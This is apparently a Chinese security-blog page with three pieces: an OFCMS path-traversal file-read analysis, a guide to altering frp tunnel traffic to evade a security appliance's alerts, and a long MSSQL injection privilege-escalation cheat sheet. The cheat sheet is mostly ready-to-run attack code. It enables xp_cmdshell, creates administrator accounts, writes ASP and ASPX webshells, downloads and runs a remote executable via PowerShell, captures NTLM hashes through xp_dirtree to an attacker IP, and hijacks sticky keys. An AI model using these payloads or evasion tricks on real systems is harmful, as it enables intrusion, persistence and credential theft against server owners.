在此方法中，后台管理直接将新增的数据放到数据库中，直接对数据库内容进行更新，未对不合法内容进行检测，导致该地方存在任意用户信息重置。任意文件读取漏洞复现找到模板文件所对应的路径是\ofcms-master\ofcms-admin\src\main\webapp\WEB-INF\page\default，这里可以通过目录穿越来读取任意文件。在他的上两级有个web.xml文件，我们尝试读取一些。这里不能直接编辑，burp抓个包。 web.xml文件如下所示 <!DOCTYPE web-app PUBLIC "-//Sun Microsystems, Inc.//DTD Web Application 2.3//EN" "http://td/web-app_2_3.dtd" > <web-app> <display-name>Archetype Created Web Application</display-name> <listener> <listener-class>org.apache.shiro.web.env.EnvironmentLoaderListener</listener-class> </listener> <filter> <filter-name>shiro</filter-name> <filter-class>org.apache.shiro.web.servlet.ShiroFilter</filter-class> </filter> ......... 读取成功漏洞分析漏洞文件位置：ofcms-master\ofcms-admin\src\main\java\com\ofsoft\cms\admin\controller\cms\TemplateController.java漏洞位于该模块的getTemplates方法中 package com.ofsoft.cms.admin.controller.cms; ... public void getTemplates() { //当前目录 String dirName = getPara("dir",""); //上级目录 String upDirName = getPara("up_dir","/"); //类型区分 String resPath = getPara("res_path"); //文件目录 String dir = null; if(!"/".equals(upDirName)){ dir = upDirName+dirName; }else{ dir = dirName; } File pathFile = null; if("res".equals(resPath)){ pathFile = new File(SystemUtile.getSiteTemplateResourcePath(),dir); }else { pathFile = new File(SystemUtile.getSiteTemplatePath(),dir); } File[] dirs = pathFile.listFiles(new FileFilter() { @Override public boolean accept(File file) { return file.isDirectory(); } }); if(StringUtils.isBlank (dirName)){ upDirName = upDirName.substring(upDirName.indexOf("/"),upDirName.lastIndexOf("/")); } setAttr("up_dir_name",upDirName); setAttr("up_dir","".equals(dir)?"/":dir); setAttr("dir_name",dirName.equals("")?SystemUtile.getSiteTemplatePathName():dirName); setAttr("dirs", dirs); /*if (dirName != null) { pathFile = new File(pathFile, dirName); }*/ File[] files = pathFile.listFiles(new FileFilter() { @Override public boolean accept(File file) { return !file.isDirectory() && (file.getName().endsWith(".html") || file.getName().endsWith(".xml") || file.getName().endsWith(".css") || file.getName().endsWith(".js")); } }); setAttr("files", files); String fileName = getPara("file_name", "index.html"); File editFile = null; if (fileName != null && files != null && files.length > 0) { for (File f : files) { if (fileName.equals(f.getName())) { editFile = f; break; } } if (editFile == null) { editFile = files[0]; fileName = editFile.getName(); } } setAttr("file_name", fileName); if (editFile != null) { String fileContent = FileUtils.readString(editFile); if (fileContent != null) { fileContent = fileContent.replace("<", "<").replace(">", ">"); setAttr("file_content", fileContent); setAttr("file_path", editFile); } } if("res".equals(resPath)) { render("/admin/cms/template/resource.html"); }else{ render("/admin/cms/template/index.html"); } } ...... 这里没有对dir和dir_name的值进行不合法输入检测，导致这里可以进行目录穿越，然后后面的就只有对文件是否存在进行判断，若存在则读取。所以此处存在任意文件读取漏洞。声明：本文仅限于技术讨论与分享，严禁用于非法途径。若读者因此作出任何危害网络安全行为后果自负，与本号及原作者无关。

某安全设备frp流量告警分析

前言第一次使用某商设备，不同厂商的规则库不一样，总的来说流量监控很大一部分是基于规则库来实现的，所以在进行内网穿透的时候就要考虑如何bypass设备告警。环境搭建 ubuntu 公网vps win10内网主机 wget https://github.com/fatedier/frp/releases/download/v0.44.0/frp_0.44.0_linux_amd64.tar.gz 服务端配置 bind_port = 9666 //frp服务端端口 token = 123 //客户端连接时的token认证 dashboard_port=9999 //面板服务端口 dashboard_user=Ggoodstudy //用户名 dashboard_pwd=xxxx //密码 enable_prometheus=true log_file=/var/log/frps.log //日志存放位置 log_level=info log_max_days=3 vhost_http_port=9998 //http服务端口启动 ./frps -c frps.ini 如果后台运行 nohup ./frps -c frps.ini & 访问面板 http://xx.xxx.xx.xx:9666输入账号密码登录此时服务端的配置已成功，客户端配置 [common] server_addr = xx.xxx.x.x server_port = 9666 token = 123 [rdp] type = tcp local_ip = 127.0.0.1 local_port = 3389 remote_port = 7004 这里设置代理本机的3389和8077端口 mstsc连接到主机抓取数据包 host xx.xx.xx.xx 主机ip192.168.43.246 这里我们可以看到请求的流量包，在请求服务端的9666端口详情内容就是可以看到详细数据包中src_addr为受害主机出口地址，目的端口dst_port为vps的穿透端口7004端口，目的ip为vps的私网地址。此时的连接状态显示的，同时，查看远程时的连接远程桌面时会产生这样流量特征run_id 另外有特别的发现，虚拟机winserver 2012 R2在运行客户端之后，vps在连接的过程中也能获取到宿主机的用户名这是一个比较特别的点儿，剩余的流量就是vps和跳板机的流量交互，没有很明显的特征。回头看某商设备对于frp内网穿透的告警我们可以对比之前的流量包，缺少的字段且仅有udp端口这里可能某商的规则id是基于udp_port或者说是version字段而产生的告警行为。魔改从几个方面规避流量监测 1.交互量加密对frp的认证使用tls加密，修改服务端frps.ini tlsonly = true 客户端配置frpc.ini tlsenable = true 2.重写服务端在上面的流量包中可以看到,在进行交互的时候服务端会请求客户端配置文件内容proxy_name,那么在定义变量的服务端，可以重写方法 case *msg.NewVisitorConn: if err = svr.RegisterVisitorConn(conn, m); err != nil { xl.Warn("register visitor conn error: %v", err) msg.WriteMsg(conn, &msg.NewVisitorConnResp{ ProxyName: m.ProxyName, Error: util.GenerateResponseErrorString("register visitor conn error", err, svr.cfg.DetailedErrorsToClient), }) conn.Close() } else { msg.WriteMsg(conn, &msg.NewVisitorConnResp{ ProxyName: m.ProxyName, Error: "", }) } 在客户端和服务器连接的时候流量特征变成自定义变量即可。总结 frp的特征比较明显,所以就单纯魔改frp的话除了流量上做加密外，简单的修改特征bypass设备也是可以实现的。本文仅限于技术讨论与分享，严禁用于非法途径。若读者因此作出任何危害网络安全行为后果自负，与本人无关。

数据库注入提权总结（四）

数据库注入提权总结（三）

MSSQL GetShell 扩展存储过程扩展存储简介在MSSQL注入攻击过程中，最长利用的扩展存储如下 xp_cmdshell详细使用方法： xp_cmdshell默认在mssql2000中是开启的，在mssql2005之后的版本中则默认禁止。如果用户拥有管理员sysadmin 权限则可以用sp_configure重新开启它 execute('sp_configure "show advanced options",1') # 将该选项的值设置为1 execute('reconfigure') # 保存设置 execute('sp_configure "xp_cmdshell", 1') # 将xp_cmdshell的值设置为1 execute('reconfigure') # 保存设置 execute('sp_configure') # 查看配置 execute('xp_cmdshell "whoami"') # 执行系统命令 exec sp_configure 'show advanced options',1; # 将该选项的值设置为1 reconfigure; # 保存设置 exec sp_configure 'xp_cmdshell',1; # 将xp_cmdshell的值设置为1 reconfigure; # 保存设置 exec sp_configure; # 查看配置 exec xp_cmdshell 'whoami'; # 执行系统命令 # 可以执行系统权限之后,前提是获取的主机权限是administrators组里的或者system权限 exec xp_cmdshell 'net user Guest 123456' # 给guest用户设置密码 exec xp_cmdshell 'net user Guest /active:yes' # 激活guest用户 exec xp_cmdshell 'net localgroup administrators Guest /add' # 将guest用户添加到administrators用户组 exec xp_cmdshell 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f' # 开启3389端口扩展存储Getshell 条件数据库是 db_owner 权限扩展存储必须开启，涉及到的的扩展存储过程: xp_cmdshell、 xp_dirtree、 xp_subdirs、 xp_regread 1.查看是否禁用扩展存储过程xp_cmdshell id=0 union select 1,2,count(*) FROM master..sysobjects Where xtype = 'X' AND name = 'xp_cmdshell'--+ id=1 and 1=(select count(*) from master.sys.sysobjects where name='xp_cmdshell')--+ 2.执行命令 id=1;exec master.sys.xp_cmdshell 'net user admin Admin@123 /add'--+ id=1;exec master.sys.xp_cmdshell 'net localgroup administrators admin /add'--+ 差异备份GetShell 差异备份简介差异备份数据库得到webshell。在sqlserver里dbo和sa权限都有备份数据库权限，我们可以把数据库备份称asp文件，这样我们就可以通过mssqlserver的备份数据库功能生成一个网页小马。前提条件具有db_owner权限知道web目录的绝对路径寻找绝对路径的方法报错信息字典爆破根据旁站目录进行推测存储过程来搜索在mssql中有两个存储过程可以帮我们来找绝对路径：xp_cmdshell xp_dirtree 先来看xp_dirtree直接举例子 execute master..xp_dirtree 'c:' --列出所有c:\文件、目录、子目录 execute master..xp_dirtree 'c:',1 --只列c:\目录 execute master..xp_dirtree 'c:',1,1 --列c:\目录、文件当实际利用的时候我们可以创建一个临时表把存储过程查询到的路径插入到临时表中 CREATE TABLE tmp (dir varchar(8000),num int,num1 int); insert into tmp(dir,num,num1) execute master..xp_dirtree 'c:',1,1; 当利用xp_cmdshell时，其实就是调用系统命令来寻找文件例如： ?id=1;CREATE TABLE cmdtmp (dir varchar(8000)); ?id=1;insert into cmdtmp(dir) exec master..xp_cmdshell 'for /r c:\ %i in (1*.aspx) do @echo %i' 读配置文件差异备份的大概流程 1.完整备份一次(保存位置当然可以改) backup database 库名 to disk = 'c:\ddd.bak';--+ **2.创建表并插入数据** create table [dbo].[dtest] ([cmd] [image]);--+ insert into dtest(cmd)values(0x3C25657865637574652872657175657374282261222929253E);--+ **3.进行差异备份** backup database 库名 to disk='c:\interub\wwwroot\shell.asp' WITH DIFFERENTIAL,FORMAT;--+ # 上面0x3C25657865637574652872657175657374282261222929253E即一句话木马的内容：<%execute(request("a"))%> xp_cmdshell GetShell 原理很简单，就是利用系统命令直接像目标网站写入木马 ?id=1;exec master..xp_cmdshell 'echo ^<%@ Page Language="Jscript"%^>^<%eval(Request.Item["pass"],"unsafe");%^> > c:\\WWW\\404.aspx' ; 这里要注意 <和>必须要转义，转义不是使用\而是使用^ 文件下载getshell 当我们不知道一些网站绝对路径时，我们可以通过文件下载命令，加载远程的木马文件，或者说.ps1脚本，使目标机器成功上线cs或者msf MSSQL提权存储过程说明 xp_dirtree 用于显示当前目录的子目录，有如下三个参数 directory：表示要查询的目录 depath：要显示子目录的深度，默认值是0，表示所有的子目录 file：第三个参数，布尔类型，指定是否显示子目录中的文件，默认值是0，标水不显示任何文件，只显示子目录 xp_dirtree 能够触发NTLM请求xp_dirtree '\\<attacker_IP>\any\thing' xp_subdirs 用于得到给定的文件夹内的文件夹列表 exec xp_subdirs 'c:\' xp_fixeddrives 用于查看磁盘驱动器剩余的空间 exec xp_fixeddrives xp_availablemedia 用于获得当前所有的驱动器 exec xp_availablemedia xp_fileexist 用于判断文件是否存在 exec xp_fileexist 'c:\windows\123.txt' xp_create_subdir 用于创建子目录，参数是子目录的路径 exec xp_create_subdir 'c:\users\admin\desktop\test' xp_delete_file 可用于删除文件，但是不会删除任意类型的文件，系统限制它只能删除特定类型（备份文件和报表文件）第一个参数是文件类型（File Type），有效值是0和1，0是指备份文件，1是指报表文件；第二个参数是目录路径（Folder Path），目录中的文件会被删除，目录路径必须以“\”结尾；第三个参数是文件的扩展名（File Extension），常用的扩展名是'BAK' 或'TRN'；第四个参数是Date，早于该日期创建的文件将会被删除；第五个参数是子目录（Subfolder），bool类型，0是指忽略子目录，1是指将会删除子目录中的文件； xp_regenumkeys 可以查看指定的注册表 exec xp_regenumkeys 'HKEY_CURRENT_USER','Control Panel\International' xp_regdeletekey 删除指定的注册表键值 EXEC xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe'; xp_regwrite 描述：修改注册表利用条件： xpstar.dll 修改注册表来劫持粘贴键(映像劫持) (测试结果 Access is denied，没有权限) exec master..xp_regwrite @rootkey='HKEY_LOCAL_MACHINE',@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.EXE',@value_name='Debugger',@type='REG_SZ',@value='c:\windows\system32\cmd.exe' sp_addextendedproc 可以用于恢复组件 EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll' EXEC sp_addextendedproc xp_enumgroups ,@dllname ='xplog70.dll' EXEC sp_addextendedproc xp_loginconfig ,@dllname ='xplog70.dll' EXEC sp_addextendedproc xp_enumerrorlogs ,@dllname ='xpstar.dll' EXEC sp_addextendedproc xp_getfiledetails ,@dllname ='xpstar.dll' EXEC sp_addextendedproc Sp_OACreate ,@dllname ='odsole70.dll' EXEC sp_addextendedproc Sp_OADestroy ,@dllname ='odsole70.dll' EXEC sp_addextendedproc Sp_OAGetErrorInfo ,@dllname ='odsole70.dll' EXEC sp_addextendedproc Sp_OAGetProperty ,@dllname ='odsole70.dll' EXEC sp_addextendedproc Sp_OAMethod ,@dllname ='odsole70.dll' EXEC sp_addextendedproc Sp_OASetProperty ,@dllname ='odsole70.dll' EXEC sp_addextendedproc Sp_OAStop ,@dllname ='odsole70.dll' EXEC sp_addextendedproc xp_regaddmultistring ,@dllname ='xpstar.dll' EXEC sp_addextendedproc xp_regdeletekey ,@dllname ='xpstar.dll' EXEC sp_addextendedproc xp_regdeletevalue ,@dllname ='xpstar.dll' EXEC sp_addextendedproc xp_regenumvalues ,@dllname ='xpstar.dll' EXEC sp_addextendedproc xp_regremovemultistring ,@dllname ='xpstar.dll' EXEC sp_addextendedproc xp_regwrite ,@dllname ='xpstar.dll' EXEC sp_addextendedproc xp_dirtree ,@dllname ='xpstar.dll' EXEC sp_addextendedproc xp_regread ,@dllname ='xpstar.dll' EXEC sp_addextendedproc xp_fixeddrives ,@dllname ='xpstar.dll' sp_dropextendedproc 用于删除扩展存储过程 exec sp_dropextendedproc 'xp_cmdshell' xp_cmdshell 描述： xp_cmdshell 是 Sql Server 中的一个组件，我们可以用它来执行系统命令。利用条件：拥有 DBA 权限, 在 2005 中 xp_cmdshell 的权限是 system，2008 中是 network。依赖 xplog70.dll -- 判断当前是否为DBA权限，为1则可以提权 select is_srvrolemember('sysadmin'); -- 查看是否存在 xp_cmdshell EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; -- 查看能否使用 xp_cmdshell，从MSSQL2005版本之后默认关闭 select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell' -- 关闭 xp_cmdshell EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE; -- 开启 xp_cmdshell EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; -- 执行 xp_cmdshell exec xp_cmdshell 'cmd /c whoami' -- xp_cmdshell 调用cmd.exe用powershell 远程下载exe并执行 exec xp_cmdshell '"echo $client = New-Object System.Net.WebClient > %TEMP%\test.ps1 & echo $client.DownloadFile("http://example/test0.exe","%TEMP%\test.exe") >> %TEMP%\test.ps1 & powershell -ExecutionPolicy Bypass %temp%\test.ps1 & WMIC process call create "%TEMP%\test.exe""' 无回显，也无法进行dnslog怎么办：通过临时表查看命令执行结果（在注入时，要能堆叠） CREATE TABLE tmpTable (tmp1 varchar(8000)); insert into tmpTable(tmp1) exec xp_cmdshell 'ipconfig' select * from tmpTable 如果 xp_cmdshell 被删除了: 如果 xp_cmdshell 被删除了，需要重新恢复或自己上传 xplog70.dll 进行恢复以mssql2012为例，默认路径为: C:\Program Files\Microsoft SQL Server\MSSQL12.MSSQLSERVER\MSSQL\Binn\xplog70.dll-- 判断存储扩展是否存在,返回结果为1就OK Select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell' -- 恢复xp_cmdshell,返回结果为1就OK Exec sp_addextendedproc 'xp_cmdshell','xplog70.dll'; select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell' -- 否则上传xplog70.dll Exec master.dbo.sp_addextendedproc 'xp_cmdshell','D:\\xplog70.dll' sp_oacreate 描述：使用sp_oacreate的提权语句，主要是用来调用OLE对象（Object Linking and Embedding的缩写，VB中的OLE对象），利用OLE对象的run方法执行系统命令。利用条件：拥有DBA权限依赖odsole70.dll -- 判断当前是否为DBA权限，为1则可以提权 select is_srvrolemember('sysadmin'); -- 判断SP_OACREATE状态,如果存在返回1 select count(*) from master.dbo.sysobjects where xtype='x' and name='SP_OACREATE' -- 启用 sp_oacreate exec sp_configure 'show advanced options',1; reconfigure; exec sp_configure 'Ole Automation Procedures', 1; reconfigure; -- wscript.shell组件执行系统命令 declare @ffffffff0x int,@exec int,@text int,@str varchar(8000) exec sp_oacreate 'wscript.shell',@ffffffff0x output exec sp_oamethod @ffffffff0x,'exec',@exec output,'C:\\Windows\\System32\\cmd.exe /c whoami' exec sp_oamethod @exec, 'StdOut', @text out exec sp_oamethod @text, 'readall', @str out select @str; -- 输出执行结果到指定文件 declare @ffffffff0x int exec sp_oacreate 'wscript.shell',@ffffffff0x output exec sp_oamethod @ffffffff0x,'run',null,'c:\windows\system32\cmd.exe /c whoami >c:\\www\\1.txt' -- 利用com组件执行命令 declare @ffffffff0x int,@exec int,@text int,@str varchar(8000) exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@ffffffff0x output exec sp_oamethod @ffffffff0x,'exec',@exec output,'C:\\Windows\\System32\\cmd.exe /c whoami' exec sp_oamethod @exec, 'StdOut', @text out exec sp_oamethod @text, 'readall', @str out select @str; -- 利用com组件写文件 DECLARE @ObjectToken INT; EXEC Sp_OACreate '{00000566-0000-0010-8000-00AA006D2EA4}',@ObjectToken OUTPUT; EXEC Sp_OASetProperty @ObjectToken, 'Type', 1; EXEC sp_oamethod @ObjectToken, 'Open'; EXEC sp_oamethod @ObjectToken, 'Write', NULL, 0x66666666666666663078; EXEC sp_oamethod @ObjectToken, 'SaveToFile', NULL,'ffffffff0x.txt',2; EXEC sp_oamethod @ObjectToken, 'Close'; EXEC sp_OADestroy @ObjectToken; -- 利用filesystemobject写vb脚本（目录必须存在，否则也会显示成功，但是没有文件写入） declare @o int, @f int, @t int, @ret int,@a int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o,'createtextfile', @f out, 'c:\\www\\ffffffff0x.vbs', 1 exec @ret = sp_oamethod @f, 'writeline', NULL, 'hahahahahahhahahah'declare @o int, @f int, @t int, @ret int,@a int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o,'createtextfile', @f out, 'c:\\www\\ffffffff0x.vbs', 1 exec @ret = sp_oamethod @f, 'writeline', NULL, 'hahahahahahhahahah(这里是文件写入的内容)' -- 配合 wscript.shell 组件执行 DECLARE @s int EXEC sp_oacreate [wscript.shell], @s out EXEC sp_oamethod @s,[run],NULL,[c:\\www\\ffffffff0x.vbs] -- 复制具有不同名称和位置的 calc.exe 可执行文件（测试未成功） declare @ffffffff0x int; exec sp_oacreate 'scripting.filesystemobject', @ffffffff0x out; exec sp_oamethod @ffffffff0x,'copyfile',null,'c:\\windows\\system32\calc.exe','c:\\windows\\system32\calc_copy.exe'; -- 移动文件（测试好像只有利用写入的VB脚本才能创建） declare @ffffffff0x int exec sp_oacreate 'scripting.filesystemobject',@ffffffff0x out exec sp_oamethod @ffffffff0x,'movefile',null,'c:\\www\\1.txt','c:\\www\\3.txt' -- 替换粘滞键 declare @ffffffff0x int; exec sp_oacreate 'scripting.filesystemobject', @ffffffff0x out; exec sp_oamethod @ffffffff0x,'copyfile',null,'c:\\windows\\system32\calc.exe','c:\\windows\\system32\sethc.exe'; declare @ffffffff0x int; exec sp_oacreate 'scripting.filesystemobject', @ffffffff0x out; exec sp_oamethod @ffffffff0x,'copyfile',null,'c:\windows\system32\sethc.exe','c:\windows\system32\dllcache\sethc.exe' -- 使用JavaScript创建账户，更改其密码并将新账号添加到管理员组（测试未成功） declare @ffffffff0x int EXEC sp_OACreate 'ScriptControl',@ffffffff0x OUT EXEC sp_OASetProperty @ffffffff0x, 'Language','JavaScript' EXEC sp_OAMethod @ffffffff0x, 'Eval', NULL,'var o=new ActiveXObject("Shell.Users");z=o.create("testuser");z.changePassword("123456!@#","");z.setting("AccountType")=3;'; SQL Server Agent Job 代理执行计划任务描述： SQL Server 代理是一项 Microsoft Windows 服务，它执行计划的管理任务，这些任务在 SQL Server 中称为作业。利用条件：拥有 DBA 权限需要 sqlserver 代理 (sqlagent) 开启，Express 版本Sql Server 是无法启用的 -- 开启 sqlagent 服务 (还是没有权限，很纳闷，sa账户登录还没权限) exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'; -- 利用任务计划命令执行（无回显,可以 dnslog） -- 创建任务 test，这里test为任务名称，并执行命令，命令执行后的结果，将返回给文本文档out.txt use msdb; exec sp_delete_job null,'test' exec sp_add_job 'test' exec sp_add_jobstep null,'test',null,'1','cmdexec','cmd /c "whoami>c:/out.txt"' exec sp_add_jobserver null,'test',@@servername exec sp_start_job 'test'; CLR提权描述：从 SQL Server 2005 (9.x) 开始，SQL Server 集成了用于 Microsoft Windows 的 .NET Framework 的公共语言运行时 (CLR) 组件。这意味着现在可以使用任何 .NET Framework 语言（包括 Microsoft Visual Basic .NET 和 Microsoft Visual C#）来编写存储过程、触发器、用户定义类型、用户定义函数、用户定义聚合和流式表值函数。 - https://docs.microsoft.com/zh-cn/sql/relational-databases/clr-integration/c CLR 方式可以利用 16 进制文件流方式导入 DLL 文件，不需要文件落地 https://github.com/SafeGroceryStore/MDUT/blob/main/MDAT-DEV/src/main/Plugins/Mssql/clr.txt dll的制作可以参考下面的文章 https://xz.aliyun.com/t/10955#toc-12 利用条件：拥有DBA权限 -- 启用CLR,SQL Server 2017版本之前 sp_configure 'show advanced options',1;RECONFIGURE; -- 显示高级选项 sp_configure 'clr enabled',1;RECONFIGURE; -- 启用CLR ALTER DATABASE master SET TRUSTWORTHY ON; -- 将存储.Net程序集的数据库配置为可信赖的 -- 启用CLR，SQL Server 2017版本及之后,引入了严格的安全性，可以选择根据提供的 SHA512 散列专门授予单个程序集的 UNSAFE 权限 sp_configure 'show advanced options',1;RECONFIGURE; sp_configure 'clr enabled',1;RECONFIGURE; sp_add_trusted_assembly @hash= <SHA512 of DLL>; -- 将某程序集的SHA512哈希值添加到可信程序集列表中 -- 配置 EXTERNAL ACCESS ASSEMBLY 权限, test 是我指定的数据库 EXEC sp_changedbowner 'sa' ALTER DATABASE [test] SET trustworthy ON -- 导入CLR插件 CREATE ASSEMBLY [mssql_CLR] AUTHORIZATION [dbo] FROM 0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C0103006607056200000000000 WITH PERMISSION_SET = UNSAFE; GO -- 创建CLR函数 CREATE PROCEDURE [dbo].[ExecCommand] @cmd NVARCHAR (MAX) AS EXTERNAL NAME [mssql_CLR].[StoredProcedures].[ExecCommand] go -- 利用CLR执行系统命令 exec dbo.ExecCommand "whoami /all"; ------------------------------------------------------------------------------------------------------------------------------ -- 格式简化 -- 导入CLR插件 CREATE ASSEMBLY [clrdata] AUTHORIZATION [dbo] FROM 0x16进制的dll WITH PERMISSION_SET = UNSAFE; -- 创建CLR函数 CREATE PROCEDURE [dbo].[testclrexec] @method NVARCHAR (MAX) , @arguments NVARCHAR (MAX) AS EXTERNAL NAME [clrdata].[StoredProcedures].[testclrexec] -- 利用CLR执行系统命令 exec testclrexec 'cmdexec',N'whoami' 触发器提权触发器是一种特殊类型的存储过程，它不同于存储过程。触发器主要是通过事件进行触发被自动调用执行的。而存储过程可以通过存储过程的名称被调用。 SqlServer 包括三种常规类型的触发器：DML 触发器、DDL 触发器和登录触发器登录触发器：登录触发器将为响应 LOGIN 事件而激发存储过程。与 SQL Server 实例建立用户会话时将引发此事件。登录触发器将在登录的身份验证阶段完成之后且用户会话实际建立之前激发。因此，来自触发器内部且通常将到达用户的所有消息(例如错误消息和来自 PRINT 语句的消息)会传送到 SQL Server 错误日志。如果身份验证失败，将不激发登录触发器。 -- 设置一个触发器 ffffffff0x,当 user 表更新时触发命令 (user 表必须存在，且容易卡死因为这个calc在运行查询就不会停止) set ANSI_NULLS on go set QUOTED_IDENTIFIER on go create trigger [ffffffff0x] on [user] AFTER UPDATE as begin execute master..xp_cmdshell 'cmd.exe /c calc.exe' end go -- user 表 update 更新时，自动触发 UPDATE user SET id = '22' WHERE nickname = 'f0x' SQL Server R 和 Python 的利用描述在 SQL Server 2017 及更高版本中，R 与 Python 一起随附在机器学习服务中。该服务允许通过 SQL Server 中 sp_execute_external_script 执行 Python 和 R 脚本利用条件： Machine Learning Services 必须要在 Python 安装过程中选择必须启用外部脚本 EXEC sp_configure 'external scripts enabled', 1 RECONFIGURE WITH OVERRIDE 重新启动数据库服务器用户拥有执行任何外部脚本权限 -- R脚本利用 -- 利用 R 执行命令 sp_configure 'external scripts enabled' GO EXEC sp_execute_external_script @language=N'R', @script=N'OutputDataSet <- data.frame(system("cmd.exe /c dir",intern=T))' WITH RESULT SETS (([cmd_out] text)); GO -- 利用 R 抓取 Net-NTLM 哈希 @script=N'.libPaths("\\\\testhost\\foo\\bar");library("0mgh4x")' -- Python脚本利用 -- 查看版本 exec sp_execute_external_script @language =N'Python', @script=N'import sys OutputDataSet = pandas.DataFrame([sys.version])' WITH RESULT SETS ((python_version nvarchar(max))) -- 利用 Python 执行命令 exec sp_execute_external_script @language =N'Python', @script=N'import subprocess p = subprocess.Popen("cmd.exe /c whoami", stdout=subprocess.PIPE) OutputDataSet = pandas.DataFrame([str(p.stdout.read(), "utf-8")])' -- 利用 Python 读文件 EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(open("C:\\inetpub\\wwwroot\\web.config", "r").read())' WITH RESULT SETS (([cmd_out] nvarchar(max))) AD Hoc 分布式查询 & Microsoft OLE DB Provider for Microsoft Jet (沙盒提权) AD Hoc 分布式查询允许从多个异构数据源（例如 SQL Server 的多个实例）访问数据。这些数据源可以存储在相同或不同的计算机上。启用临时访问后，登录到该实例的任何用户都可以使用 OLE DB 提供程序通过 OPENROWSET 或 OPENDATASOURCE 函数执行引用网络上任何数据源的 SQL 语句。攻击者滥用 Ad Hoc 分布式查询和 Microsoft OLE DB Provider for Microsoft Jet 来创建和执行旨在从远程服务器下载恶意可执行文件的脚本。利用条件拥有 DBA 权限 sqlserver 服务权限为 system 服务器拥有 jet.oledb.4.0 驱动 -- 修改注册表，关闭沙盒模式 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0 -- 开启 Ad Hoc Distributed Queries EXEC sp_configure 'show advanced options', 1 RECONFIGURE GO EXEC sp_configure 'ad hoc distributed queries', 1 RECONFIGURE GO -- Until SQL Server 2012 EXEC sp_MSset_oledb_prop N'Microsoft.ACE.OLEDB.12.0', N'AllowInProcess', 1 EXEC master.dbo.sp_MSset_oledb_prop N'Microsoft.Jet.OLEDB.4.0', N'AllowInProcess', 1 -- SQL Server 2014 or later EXEC sp_MSset_oledb_prop N'Microsoft.ACE.OLEDB.12.0', N'DynamicParameters', 1 EXEC master.dbo.sp_MSset_oledb_prop N'Microsoft.Jet.OLEDB.4.0', N'DynamicParameters', 1 -- Windows 2003 系统 c:\windows\system32\ias\ 目录下默认自带了 2 个 Access 数据库文件 ias.mdb/dnary.mdb, 所以直接调用即可. -- Windows 2008 R2 默认无 Access 数据库文件, 需要自己上传, 或者用 UNC 路径加载文件方能执行命令. -- SQL Server2008 默认未注册 microsoft.jet.oledb.4.0 接口, 所以无法利用沙盒模式执行系统命令. Select * From OpenRowSet('microsoft.jet.oledb.4.0',';Database=c:\windows\system32\ias\ias.mdb', 'select shell("whoami")'); select * from openrowset('microsoft.jet.oledb.4.0',';database=\\192.168.1.8\file\ias.mdb','select shell("c:\windows\system32\cmd.exe /c net user >c:\test.txt ")');

第2页第3页第4页第5页第6页第7页第8页第9页第10页第11页第12页第13页第14页第15页第16页第17页第18页第19页第20页第21页第22页第23页第24页第25页第26页第27页第28页第29页第30页第31页第32页第33页第34页第35页第36页第37页第38页第39页第40页第41页第42页第43页第44页第45页第46页第47页第48页第49页第50页第51页第52页第53页第54页第55页第56页第57页第58页第59页第60页第61页